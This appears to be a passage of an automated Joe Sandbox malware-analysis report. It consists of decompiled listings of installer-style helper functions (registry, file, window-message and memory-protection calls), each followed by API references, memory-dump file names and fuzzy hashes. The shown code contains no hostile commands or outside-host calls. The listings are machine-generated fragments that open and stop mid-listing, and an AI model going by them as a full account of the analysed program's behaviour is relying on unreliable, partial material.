                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t7 = E00406454(_a4,  &_a12);
                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                            					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t9 = 6;
                                                                                                                                                                                                                            				return _t9;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                                                            • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401735() {
                                                                                                                                                                                                                            				long _t5;
                                                                                                                                                                                                                            				WCHAR* _t8;
                                                                                                                                                                                                                            				WCHAR* _t11;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				long _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
                                                                                                                                                                                                                            				_t17 = _t5;
                                                                                                                                                                                                                            				if(_t17 == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                                                                                                                                                                                            					 *_t11 = _t8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PathSearch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2203818243-0
                                                                                                                                                                                                                            • Opcode ID: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                                                                                                                                                            • Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            				long _t11;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t11 = _a12;
                                                                                                                                                                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D704,0040CEF0,00403579,0040CEF0,0040D704,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            				long _t11;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t11 = _a12;
                                                                                                                                                                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x687e5048 = _a4;
                                                                                                                                                                                                                            				if(_a8 == 1) {
                                                                                                                                                                                                                            					VirtualProtect(0x687e505c, 4, 0x40, 0x687e504c); // executed
                                                                                                                                                                                                                            					 *0x687e505c = 0xc2;
                                                                                                                                                                                                                            					 *0x687e504c = 0;
                                                                                                                                                                                                                            					 *0x687e5054 = 0;
                                                                                                                                                                                                                            					 *0x687e5068 = 0;
                                                                                                                                                                                                                            					 *0x687e5058 = 0;
                                                                                                                                                                                                                            					 *0x687e5050 = 0;
                                                                                                                                                                                                                            					 *0x687e5060 = 0;
                                                                                                                                                                                                                            					 *0x687e505e = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(687E505C,00000004,00000040,687E504C), ref: 687E2A9D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                            • Opcode ID: fa00fcbb7038aa385c86e1e9a74fb0961b66c6a736ec790140fac82801915ee2
                                                                                                                                                                                                                            • Instruction ID: 522c483f972c688362ce4ea6de88505e697abca1d8bf117a53985c7c2472a3fd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa00fcbb7038aa385c86e1e9a74fb0961b66c6a736ec790140fac82801915ee2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F0AEB0A44288DFCBA0CF38E54C70D3BE0B70A314B54457AF2B8D6280E3744144DBA1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				long _t8;
                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t7 = E00406454(_a4,  &_a12);
                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                            					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t9 = 6;
                                                                                                                                                                                                                            				return _t9;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                            • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015A3() {
                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                                                                                                                                                            				_t14 = _t5;
                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00404610(int _a4) {
                                                                                                                                                                                                                            				struct HWND__* _t2;
                                                                                                                                                                                                                            				long _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 =  *0x429238;
                                                                                                                                                                                                                            				if(_t2 != 0) {
                                                                                                                                                                                                                            					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004035F8(long _a4) {
                                                                                                                                                                                                                            				long _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004045F9(int _a4) {
                                                                                                                                                                                                                            				long _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x00404607
                                                                                                                                                                                                                            0x0040460d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004045E6(int _a4) {
                                                                                                                                                                                                                            				int _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x004045f0
                                                                                                                                                                                                                            0x004045f6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E687E2B98(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x687e5050 != 0 && E687E2ADB(_a4) == 0) {
                                                                                                                                                                                                                            					 *0x687e5054 = _t93;
                                                                                                                                                                                                                            					if( *0x687e504c != 0) {
                                                                                                                                                                                                                            						_t93 =  *0x687e504c;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E687E30C0(E687E2AD5(), __ecx);
                                                                                                                                                                                                                            						 *0x687e504c = _t93;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t28 = E687E2B09(_a4);
                                                                                                                                                                                                                            				_t94 = _t93 + 4;
                                                                                                                                                                                                                            				if(_t28 <= 0) {
                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                            					_t29 = E687E2AFD();
                                                                                                                                                                                                                            					_t72 = _a4;
                                                                                                                                                                                                                            					_t79 =  *0x687e5058;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                                                                                                                                                            					 *0x687e5058 = _t72;
                                                                                                                                                                                                                            					E687E2AF7();
                                                                                                                                                                                                                            					_t33 = CloseHandle(??); // executed
                                                                                                                                                                                                                            					 *0x687e5034 = _t33;
                                                                                                                                                                                                                            					 *0x687e5038 = _t79;
                                                                                                                                                                                                                            					if( *0x687e5050 != 0 && E687E2ADB( *0x687e5058) == 0) {
                                                                                                                                                                                                                            						 *0x687e504c = _t94;
                                                                                                                                                                                                                            						_t94 =  *0x687e5054;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t80 =  *0x687e5058;
                                                                                                                                                                                                                            					_a4 = _t80;
                                                                                                                                                                                                                            					 *0x687e5058 =  *((intOrPtr*)(E687E2AFD() + _t80));
                                                                                                                                                                                                                            					_t37 = E687E2AE9(_t80);
                                                                                                                                                                                                                            					_pop(_t81);
                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                            						_t40 = E687E2B09(_t81);
                                                                                                                                                                                                                            						if(_t40 > 0) {
                                                                                                                                                                                                                            							_push(_t40);
                                                                                                                                                                                                                            							_push(E687E2B14() + _a4 + _v8);
                                                                                                                                                                                                                            							_push(E687E2B1E());
                                                                                                                                                                                                                            							if( *0x687e5050 <= 0 || E687E2ADB(_a4) != 0) {
                                                                                                                                                                                                                            								_pop(_t88);
                                                                                                                                                                                                                            								_pop(_t45);
                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								asm("loop 0xfffffff5");
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_pop(_t89);
                                                                                                                                                                                                                            								_pop(_t49);
                                                                                                                                                                                                                            								 *0x687e504c =  *0x687e504c +  *(_t89 + _t49) * 4;
                                                                                                                                                                                                                            								asm("loop 0xffffffeb");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t107 =  *0x687e5058;
                                                                                                                                                                                                                            					if( *0x687e5058 == 0) {
                                                                                                                                                                                                                            						 *0x687e504c = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E687E2B42(_t107, _a4,  *0x687e5034,  *0x687e5038);
                                                                                                                                                                                                                            					return _a4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(E687E2B14() + _a4);
                                                                                                                                                                                                                            				_t56 = E687E2B1A();
                                                                                                                                                                                                                            				_v8 = _t56;
                                                                                                                                                                                                                            				_t77 = _t28;
                                                                                                                                                                                                                            				_push(_t68 + _t56 * _t77);
                                                                                                                                                                                                                            				_t70 = E687E2B26();
                                                                                                                                                                                                                            				_t87 = E687E2B22();
                                                                                                                                                                                                                            				_t90 = E687E2B1E();
                                                                                                                                                                                                                            				_t61 = _t77;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                                                                                                                                                            				asm("loop 0xfffffff1");
                                                                                                                                                                                                                            				goto L9;
                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 687E2C57
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
